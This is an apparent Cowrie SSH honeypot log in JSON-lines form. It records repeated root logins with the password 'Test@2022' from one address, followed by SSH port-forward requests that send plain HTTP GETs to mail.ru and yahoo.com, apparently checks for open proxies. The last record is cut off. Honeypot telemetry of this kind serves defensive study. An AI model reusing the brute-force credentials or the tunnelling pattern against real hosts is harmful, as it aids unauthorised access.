{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":17514,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17514","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.396252Z","session":"50dc266b3b53"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.446628Z","src_ip":"77.83.207.83","session":"50dc266b3b53"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.497390Z","src_ip":"77.83.207.83","session":"50dc266b3b53"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59408,"dst_ip":"1.2.3.4","dst_port":22,"session":"d12923a05416","protocol":"ssh","message":"New connection: 77.83.207.83:59408 (1.2.3.4:22) [session: d12923a05416]","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.547251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.548278Z","src_ip":"77.83.207.83","session":"d12923a05416"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.600199Z","src_ip":"77.83.207.83","session":"d12923a05416"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.852039Z","src_ip":"77.83.207.83","session":"d12923a05416"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22802,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22802","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.903493Z","session":"d12923a05416"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.953879Z","src_ip":"77.83.207.83","session":"d12923a05416"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3750,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3750","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.097054Z","session":"d12923a05416"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.147733Z","src_ip":"77.83.207.83","session":"d12923a05416"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":7749,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:7749","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.288888Z","session":"d12923a05416"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.339798Z","src_ip":"77.83.207.83","session":"d12923a05416"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.391440Z","src_ip":"77.83.207.83","session":"d12923a05416"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59481,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d5cb78a3946","protocol":"ssh","message":"New connection: 77.83.207.83:59481 (1.2.3.4:22) [session: 7d5cb78a3946]","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.440348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.441124Z","src_ip":"77.83.207.83","session":"7d5cb78a3946"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.491548Z","src_ip":"77.83.207.83","session":"7d5cb78a3946"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.741911Z","src_ip":"77.83.207.83","session":"7d5cb78a3946"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15433,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15433","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.793506Z","session":"7d5cb78a3946"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.844414Z","src_ip":"77.83.207.83","session":"7d5cb78a3946"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":9121,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:9121","sensor":"my-vps","timestamp":"2025-08-31T03:47:08.988592Z","session":"7d5cb78a3946"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.038905Z","src_ip":"77.83.207.83","session":"7d5cb78a3946"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44286,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cd75c68e391","protocol":"ssh","message":"New connection: 212.227.125.160:44286 (1.2.3.4:22) [session: 9cd75c68e391]","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.147558Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":2360,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:2360","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.180540Z","session":"7d5cb78a3946"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.230719Z","src_ip":"77.83.207.83","session":"7d5cb78a3946"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.281667Z","src_ip":"77.83.207.83","session":"7d5cb78a3946"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59557,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dee1254b278","protocol":"ssh","message":"New connection: 77.83.207.83:59557 (1.2.3.4:22) [session: 4dee1254b278]","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.331708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.332773Z","src_ip":"77.83.207.83","session":"4dee1254b278"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.383813Z","src_ip":"77.83.207.83","session":"4dee1254b278"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.637667Z","src_ip":"77.83.207.83","session":"4dee1254b278"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8028,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:8028","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.689867Z","session":"4dee1254b278"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.740994Z","src_ip":"77.83.207.83","session":"4dee1254b278"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.811062Z","src_ip":"212.227.125.160","session":"9cd75c68e391"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.812340Z","src_ip":"212.227.125.160","session":"9cd75c68e391"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":20856,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20856","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.885244Z","session":"4dee1254b278"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:09.936265Z","src_ip":"77.83.207.83","session":"4dee1254b278"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":25257,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:25257","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.081382Z","session":"4dee1254b278"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.132881Z","src_ip":"77.83.207.83","session":"4dee1254b278"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.184763Z","src_ip":"77.83.207.83","session":"4dee1254b278"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59628,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fb265148514","protocol":"ssh","message":"New connection: 77.83.207.83:59628 (1.2.3.4:22) [session: 6fb265148514]","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.235617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.236379Z","src_ip":"77.83.207.83","session":"6fb265148514"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.288316Z","src_ip":"77.83.207.83","session":"6fb265148514"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.544036Z","src_ip":"77.83.207.83","session":"6fb265148514"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11768,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11768","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.596439Z","session":"6fb265148514"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.647809Z","src_ip":"77.83.207.83","session":"6fb265148514"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":32048,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:32048","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.793660Z","session":"6fb265148514"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.845083Z","src_ip":"77.83.207.83","session":"6fb265148514"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":21425,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:21425","sensor":"my-vps","timestamp":"2025-08-31T03:47:10.989597Z","session":"6fb265148514"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.041396Z","src_ip":"77.83.207.83","session":"6fb265148514"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.093629Z","src_ip":"77.83.207.83","session":"6fb265148514"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59724,"dst_ip":"1.2.3.4","dst_port":22,"session":"830a666021f4","protocol":"ssh","message":"New connection: 77.83.207.83:59724 (1.2.3.4:22) [session: 830a666021f4]","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.142935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.143789Z","src_ip":"77.83.207.83","session":"830a666021f4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh